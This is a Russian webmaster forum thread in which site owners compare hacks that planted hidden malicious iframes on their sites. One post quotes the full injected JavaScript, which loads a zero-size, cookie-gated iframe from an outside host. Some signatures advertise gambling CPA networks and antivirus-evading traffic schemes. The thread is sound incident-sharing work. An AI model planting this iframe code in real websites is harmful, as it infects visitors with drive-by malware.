Яндекс нашел вирус на сайте

SS
На сайте с 25.08.2013
Offline
0
#61
sdiev:
Нет 😒 мне iframe заливали на платный буржуйский движок! а так же на DLE, Joomla (не зависимо от версии)

У меня все 3 сайта самописные. Так что CMS роли не играет, мне кажется.

Читающий
На сайте с 23.04.2009
Offline
60
#62
sdiev:
Нет 😒 мне iframe заливали на платный буржуйский движок! а так же на DLE, Joomla (не зависимо от версии)

Меня вот это озадачивает:

Читающий:
Три сайта пару месяцев как залиты и отключены, и они чистые остались.
почему?
Лучший доход для файлового трафика: Без бана АВ (http://goo.gl/F4Lem). А так же здесь (goo.gl/HzCxo) и здесь (goo.gl/B5BDC) Закроем продуктовые магазины за не уникальное содержание ©
G
На сайте с 25.08.2013
Offline
0
#63

У меня тоже взломали сайты, хостинг хостлайф, сервер в германии, были перезалиты по одному .js файлу на каждый сайт с вредоносным фреймом, движки Дле и Джумла. Сменил все пассы, пропатчил - не помогло. Ещё посмотрел соседей на одном ip большинство из них содержат аналогичные вредоносные фреймы.

K5
На сайте с 21.07.2010
Offline
209
#64

аналогично, на vps-server.ru

вставка в media/system/js.caption.js

var if89fhmv = document.createElement('iframe');if89fhmv.name = 'if89fhmv';if89fhmv.src = 'http://vernum.1ber. to/';if89fhmv.style.width = '0px';if89fhmv.style.height = '0px';window.onload = function() {document.cookie = 'chcook=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT'; if ((document.cookie.indexOf('if89fhmv=') == -1) && (document.cookie.indexOf('chcook=') != -1)) { document.getElementsByTagName('body')[0].appendChild(if89fhmv);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000);setTimeout(function() { document.cookie = 'if89fhmv=yes; path=/; expires=' + expiresDate; }, 5000);}};

включил логирование, ждем повторения...

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
K
На сайте с 26.01.2013
Offline
5
#65

Друзья, когда первый раз обнаружили вредоносный код на сайте? У меня 6 августа. Напишите хотя бы приблизительно.

Redbaron _chaos
На сайте с 12.08.2009
Offline
667
#66

Таже беда, пару дней назад появился вирус..Название уже не помню, что то с Трояном и JS связано.

Вордпресс.

При этом: в ход в панель хостинга только для моего Айпи. На сайте (он там один), в Хтаче вход в админку только для моего Айпи, плюс плагин Баттер и все что он предлагает. Это смена названия всех папок и закрытие дырок.

Всякие комментарии и заливка файлов/авок запрещена, хз как проник. Надо в логах копаться.

Благо бекапы автоматом делают, и за месяц было 3 разных.

Гемблинг, беттинг, крипта на весь мир в 3snet, 1500+ офферов. ( https://clck.ru/TdZLM ) = = CPA.HOUSE - Топовая CPA сеть ( https://clck.ru/34Swci )
G
На сайте с 25.08.2013
Offline
0
#67
konservator:
Друзья, когда первый раз обнаружили вредоносный код на сайте? У меня 6 августа. Напишите хотя бы приблизительно.

Первый раз 17 августа и буквально на днях

[Удален]
#68

Первый раз 8 августа, второй 24 августа. Лечил сменой паролей и удалением исходного кода. (смена пораля не помогла похоже.)

dendav
На сайте с 18.03.2010
Offline
51
#69
Читающий:
Мне кажется, что в моей ситуации можно сделать вывод что дыра в ДЛЕ. Что думаете?

У меня самопис и вообще не было в файлах чужого кода, ни в JS, ни в PHP, ни в HTML. Я не запоминаю пароли в фтп-клиентах и в браузерах, пароли сложные и регулярно меняются, рабочая машина регулярно проверяется на трояны несколькими антивирусами, права на файлы и папки самые драконовские.

При этом Яндекс всё равно ловил переадресацию при заходе на сайт с мобильных устройств. Появилось ощущение, что сам сайт тут вообще не при чём, сломан сервер и переадресация идёт уровнем выше.

C5
На сайте с 26.07.2012
Offline
32
#70

кто шарит, гляньте код, который я выложил, что он значит?

вот в этом посте /ru/forum/comment/12072918

похоже, что ломают cpanel и используют папки tmp, .cpanel

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий